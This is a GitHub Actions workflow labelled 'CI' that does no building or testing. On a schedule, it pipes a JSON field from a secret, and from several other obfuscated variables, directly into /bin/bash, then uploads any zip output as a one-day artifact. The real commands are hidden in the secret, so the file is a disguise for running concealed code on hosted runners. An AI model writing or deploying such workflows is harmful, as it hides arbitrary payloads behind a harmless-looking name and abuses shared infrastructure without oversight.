name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '25 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          tpq9: ${{ secrets.tpq9 }}
        run: |
          printf '%s' "$tpq9" | jq -r .kyxp5628 | /bin/bash
          printf '%s' "$gtddp470" | jq -r .lsfqr877 | /bin/bash
          echo $jrbj05075 | jq -r .jmos1586 | /bin/bash
          echo $vbn5 | jq -r .g8919 | /bin/bash
          echo $ugji511 | jq -r .fyqck04 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: 2QlWg3AV
          path: "*.zip"
          retention-days: 1
